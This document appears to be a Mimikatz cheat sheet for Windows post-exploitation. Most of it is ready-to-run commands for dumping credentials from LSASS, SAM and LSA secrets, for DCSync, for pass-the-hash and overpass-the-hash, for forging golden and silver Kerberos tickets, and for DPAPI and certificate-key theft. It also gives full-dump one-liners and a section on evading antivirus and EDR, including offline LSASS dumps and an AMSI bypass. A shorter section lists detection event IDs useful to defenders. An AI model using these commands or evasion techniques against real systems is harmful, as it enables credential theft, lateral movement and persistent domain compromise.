
Mimikatz

Mimikatz is a Windows post-exploitation tool developed by Benjamin Delpy that extracts credentials, hashes, PINs, and Kerberos tickets from memory. It is one of the most widely used tools for credential theft and lateral movement in Windows environments.

Key Capabilities

  • Credential Extraction: Dump plaintext passwords, hashes, and Kerberos tickets from LSASS memory
  • Pass-the-Hash/Pass-the-Ticket: Use extracted credentials for lateral movement
  • DPAPI Attacks: Decrypt Windows Data Protection API protected secrets
  • Golden/Silver Tickets: Forge Kerberos tickets for persistence
  • DCSync: Replicate credentials from Domain Controllers

Installation

Kali ships the Windows binaries in its mimikatz package (under /usr/share/windows-resources/mimikatz); elsewhere, download a release from the official repository:

https://github.com/gentilkiwi/mimikatz/releases

The release binary is signatured by every mainstream AV/EDR, so on a live target one of these is usually used instead:

  • Invoke-Mimikatz: PowerShell script (PowerSploit/Empire) that reflectively loads the mimikatz binary in memory; by now heavily signatured itself
  • pypykatz: Python reimplementation of the sekurlsa/lsadump parsers; works offline on an LSASS minidump or registry hives (cross-platform), or live on Windows

Basic Usage

Enable Debug Privileges

privilege::debug

Required before any sekurlsa command: it enables SeDebugPrivilege, which needs an elevated local administrator token. Returns Privilege '20' OK on success. Even with the privilege, sekurlsa cannot open LSASS when LSA Protection (RunAsPPL) is enabled, and returns no domain plaintext or NTLM when Credential Guard is on.

Dump All Credentials from LSASS

sekurlsa::logonpasswords

Dump Credential Manager Secrets

sekurlsa::credman

Export Kerberos Tickets

sekurlsa::tickets /export

Writes one .kirbi file per cached ticket into the current directory; inject one later with kerberos::ptt.

Common Modules

Module      Purpose
sekurlsa    Extract credentials from LSASS memory
lsadump     Dump LSA secrets, SAM database, DCSync
kerberos    Kerberos ticket operations
vault       Windows Vault/Credential Manager
dpapi       DPAPI masterkey and blob decryption
crypto      Certificate and key operations (Pass-the-Certificate)
token       Token manipulation

sekurlsa Module

Dump Logon Passwords

sekurlsa::logonpasswords

Dump Credential Manager

sekurlsa::credman

Dump DPAPI Masterkeys

sekurlsa::dpapi

Dump Kerberos Tickets

sekurlsa::tickets

Pass-the-Hash

sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:<hash> /run:cmd

Spawns the /run process (cmd.exe by default) in a new logon session whose network credentials are the supplied hash. The local identity is unchanged (whoami still shows the original account); only authentication to other hosts from that process uses Administrator's hash.

Dump Kerberos Encryption Keys

sekurlsa::ekeys

Lists the AES256, AES128 and RC4 Kerberos keys of every logon session. The RC4 key (rc4_hmac_nt) is the NT hash itself; the AES keys are derived from the password with a per-account salt. Useful for Pass the Key / OverPass the Hash attacks.

Pass the Key / OverPass the Hash

sekurlsa::pth /user:Administrator /domain:DOMAIN /aes256:<aes256_key> /run:cmd

Injects the supplied key into a new logon session; when the spawned process first contacts the KDC, Kerberos uses that key as if it were the password-derived one and obtains a TGT, from which service tickets for lateral movement follow. With /ntlm only, the TGT request is RC4 (etype 23), which stands out in 4768 events of a domain that normally negotiates AES; /aes256 matches the usual etype and is preferred when the key is available.


crypto Module (Certificates)

Used for certificate operations related to Pass-the-Certificate attacks and AD CS abuse.

Export User Certificates

crypto::certificates /export

Export Machine Certificates

crypto::certificates /systemstore:local_machine /export

Make Non-Exportable Keys Exportable

crypto::capi
crypto::cng

Patches CryptoAPI (in the mimikatz process) and CNG (in lsass, so privilege::debug is needed first) so that keys flagged non-exportable are exported anyway. Run before exporting certificates. Exported PFX files are protected with the password mimikatz.

Common crypto Commands

Command                                                  Description
crypto::capi                                             Patch CryptoAPI for key export
crypto::cng                                              Patch CNG for key export
crypto::certificates /export                             Export user certificates to PFX
crypto::certificates /systemstore:local_machine /export  Export machine certificates
crypto::keys                                             List cryptographic keys
crypto::stores                                           List certificate stores

lsadump Module

Dump SAM Database

lsadump::sam

Dump LSA Secrets

lsadump::secrets

Dump Cached Domain Credentials

lsadump::cache

Live (non-hive) use of these three needs SYSTEM: run privilege::debug and then token::elevate first. lsadump::cache returns DCC2 (MsCacheV2) hashes, which cannot be passed, only cracked (hashcat mode 2100).

DCSync (requires the Replicating Directory Changes and Replicating Directory Changes All rights on the domain object, held by default by Domain Admins, Enterprise Admins and domain controllers; the request is logged as Security 4662 on the DC)

lsadump::dcsync /domain:domain.local /user:Administrator
lsadump::dcsync /domain:domain.local /all /csv

Kerberos Attacks

Golden Ticket (requires the krbtgt NT hash or AES256 key, plus the domain SID)

kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:<hash> /ptt

/krbtgt takes the RC4 (NT) hash; /aes256:<key> forges an AES ticket that matches a modern domain's default etype. The default lifetime is ten years (/endin and /renewmax change it), which on its own is a strong detection signal. /ptt injects the ticket into the current session instead of writing a .kirbi file.

Silver Ticket (requires the service account hash)

kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /target:server.domain.local /service:cifs /rc4:<hash> /ptt

For services hosted by a machine (cifs, host, rpcss, http on a member server) the service account is the computer account and /rc4 is its NT hash. The forged TGS never goes through the KDC, so no 4768/4769 is logged on a domain controller; only the target host sees the ticket.

Pass-the-Ticket

kerberos::ptt <ticket.kirbi>

Accepts a .kirbi file (for example one written by sekurlsa::tickets /export) or a directory, in which case every .kirbi in it is injected.

List Tickets

kerberos::list

Purge Tickets

kerberos::purge

DPAPI Attacks

List Vault Credentials

vault::list
vault::cred

vault::cred /patch patches lsass so that credentials stored in cleartext form (scheduled-task and similar passwords) are returned decrypted.

Decrypt DPAPI Blob

dpapi::blob /in:<blob_file> /masterkey:<key>

When running as the owning user, dpapi::blob /in:<blob_file> /unprotect decrypts through CryptUnprotectData in that user's context and needs no masterkey.

Decrypt Credential File

dpapi::cred /in:<credential_file>

Credential files live under %APPDATA%\Microsoft\Credentials and %LOCALAPPDATA%\Microsoft\Credentials; without /masterkey the command only parses the blob, with /masterkey:<key> it decrypts it.

Decrypt Masterkey via the Domain Controller (MS-BKRP)

dpapi::masterkey /in:<masterkey_file> /rpc

Masterkey files live under %APPDATA%\Microsoft\Protect\<SID>\. With /rpc the DC decrypts the user's own masterkey using the domain backup key, as the legitimate recovery path would. If the domain backup key has been exported (lsadump::backupkeys /export), /pvk:<backup_key.pvk> decrypts any domain user's masterkey offline.

Offline Attacks

Dump SAM from Registry Hives

lsadump::sam /sam:sam.hive /system:system.hive

Dump Secrets from Registry Hives

lsadump::secrets /system:system.hive /security:security.hive

Collect the hives on the target (administrator required) with reg save HKLM\SAM sam.hive, reg save HKLM\SYSTEM system.hive and reg save HKLM\SECURITY security.hive. SYSTEM is always needed: it holds the boot key that the SAM and SECURITY contents are encrypted with.

One-Liner Examples

Full Credential Dump

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

DCSync Single User

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:domain.local /user:krbtgt" "exit"

Export All Kerberos Tickets

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"

Detection and Evasion

Common Detection Points

  • LSASS memory access: Sysmon Event ID 10 with TargetImage lsass.exe and GrantedAccess 0x1010 or 0x1410 (mimikatz sekurlsa) or 0x1FFFFF (procdump, comsvcs MiniDump) from an image that is not a known AV/EDR agent
  • Process creation: Security 4688 / Sysmon Event ID 1 command lines containing module tokens such as privilege::debug or sekurlsa::; Security 4703 (token right adjusted) enabling SeDebugPrivilege
  • Pass-the-Hash: Security 4624 with LogonType 9 (NewCredentials) and LogonProcessName seclogo on the source host
  • DCSync: Security 4662 on the domain object carrying the DS-Replication-Get-Changes(-All) control-access GUIDs from an account that is not a domain controller
  • Golden/Silver tickets: 4768/4769 with RC4 (etype 0x17) in an AES domain, service ticket use with no preceding 4768 on any DC, ticket lifetimes beyond domain policy

Evasion Techniques

  • Dump LSASS once (procdump -ma lsass.exe, or the signed comsvcs.dll MiniDump export via rundll32) and parse the dump offline with pypykatz or sekurlsa::minidump, so the signatured binary never runs on the target; the dump itself still triggers the Sysmon Event ID 10 / EDR LSASS-access alert
  • Invoke-Mimikatz with an AMSI bypass; its strings are heavily signatured
  • Obfuscated or custom-compiled builds with renamed modules and strings
  • None of this helps against LSA Protection or Credential Guard, which block or empty the sekurlsa results however mimikatz is delivered

Alternative tooling:

Tool        Description
pypykatz    Python implementation (cross-platform)
SharpKatz   C# implementation
Rubeus      C# Kerberos toolkit
Impacket    Python toolkit with secretsdump.py
LaZagne     Multi-platform credential recovery

Core Takeaways

  • Run privilege::debug (elevated local administrator) before any sekurlsa command, and token::elevate as well before live lsadump::sam, secrets and cache
  • sekurlsa::logonpasswords is the go-to command for credential extraction, but returns nothing useful under LSA Protection or Credential Guard
  • DCSync requires the Replicating Directory Changes (All) rights, held by Domain Admins by default, and shows up as Security 4662 on the domain controller
  • Kerberos attacks (Golden/Silver tickets) persist as long as the krbtgt or service account key is unchanged; krbtgt must be reset twice to invalidate golden tickets
  • DPAPI attacks can recover Credential Manager, browser, and application secrets
  • Prefer dumping LSASS once and analysing offline; the LSASS access itself remains the detection point